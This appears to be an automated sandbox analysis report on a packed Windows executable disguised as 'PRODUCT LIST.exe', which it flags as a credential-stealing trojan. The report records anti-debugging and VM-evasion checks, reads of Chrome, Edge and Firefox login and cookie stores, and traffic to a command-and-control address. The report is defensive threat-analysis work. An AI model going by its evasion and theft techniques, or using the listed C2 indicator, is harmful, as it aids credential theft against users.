                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Section loaded: uxtheme.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: PRODUCT LIST.exe | Static file information: File size 1776640 > 1048576
Source: PRODUCT LIST.exe | Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x1a4200
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: PRODUCT LIST.exe, 00000000.00000002.2197239004.0000000000216000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Unpacked PE file: 0.2.PRODUCT LIST.exe.1f0000.0.unpack :ER; :R; :R;.vm_sec:W;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: PRODUCT LIST.exe | Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: .boot
Source: PRODUCT LIST.exe | Static PE information: section name:
Source: PRODUCT LIST.exe | Static PE information: section name:
Source: PRODUCT LIST.exe | Static PE information: section name:
Source: PRODUCT LIST.exe | Static PE information: section name: .vm_sec
Source: PRODUCT LIST.exe | Static PE information: section name: .themida
Source: PRODUCT LIST.exe | Static PE information: section name: .boot
Source: PRODUCT LIST.exe | Static PE information: section name: entropy: 7.994326576469916
Source: PRODUCT LIST.exe | Static PE information: section name: .boot entropy: 7.95802050682975

Boot Survival

Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Window searched: window name: PROCMON_WINDOW_CLASS

Hooking and other Techniques for Hiding and Protection

Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49707
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Memory allocated: 1000000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Memory allocated: 3050000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Memory allocated: 2EA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Window / User API: threadDelayed 1477
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Window / User API: threadDelayed 6539
Source: C:\Users\user\Desktop\PRODUCT LIST.exe TID: 432 | Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\PRODUCT LIST.exe TID: 5384 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\PRODUCT LIST.exe TID: 6624 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Thread delayed: delay time: 922337203685477
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp9E5A.tmp.0.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: tmp9E5A.tmp.0.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp9E5A.tmp.0.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp9E5A.tmp.0.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: tmp9E5A.tmp.0.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp9E5A.tmp.0.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp9E5A.tmp.0.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PRODUCT LIST.exe, 00000000.00000002.2198304415.0000000000F29000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp9E5A.tmp.0.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp9E5A.tmp.0.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp9E5A.tmp.0.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp9E5A.tmp.0.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp9E5A.tmp.0.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp9E5A.tmp.0.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp9E5A.tmp.0.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp9E5A.tmp.0.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (a number before a technique name is the hit count shown in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 741 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 561 Virtualization/Sandbox Evasion | Security Account Manager | 561 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 114 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
PRODUCT LIST.exe | 55% | ReversingLabs | Win32.Trojan.Leonem |
PRODUCT LIST.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
PRODUCT LIST.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://api.ipify.orgcookies//setti | 0% | Avira URL Cloud | safe |
104.219.234.170:16383 | 0% | Avira URL Cloud | safe |
http://104.219.234.170:16383t- | 0% | Avira URL Cloud | safe |
https://api.ipify.orgcoo | 0% | Avira URL Cloud | safe |
http://104.219.234.170:16383/ | 0% | Avira URL Cloud | safe |
http://104.219.234.170:16383 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ip.sb | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
104.219.234.170:16383 | true | Avira URL Cloud: safe | unknown
http://104.219.234.170:16383/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://104.219.234.170:16383t- | PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ipinfo.io/ip%appdata% | PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
https://duckduckgo.com/ac/?q= | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/CheckConnectResponse | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.datacontract.org/2004/07/ | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003433000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/EnvironmentSettings | PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | false | | high
https://api.ip.sb | PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ip.sb/geoip | PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/envelope/ | PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
http://tempuri.org/ | PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/CheckConnect | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
https://www.ecosia.org/newtab/ | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
http://tempuri.org/Endpoint/VerifyUpdateResponse | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/SetEnvironment | PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/SetEnvironmentResponse | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/GetUpdates | PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
https://api.ip.sb/geoip%USERPEnvironmentROFILE | PRODUCT LIST.exe | false | | high
https://api.ipify.orgcookies//settinString.Removeg | PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.orgcookies//setti | PRODUCT LIST.exe | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/GetUpdatesResponse | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
http://104.219.234.170:16383 | PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/VerifyUpdate | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/0 | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
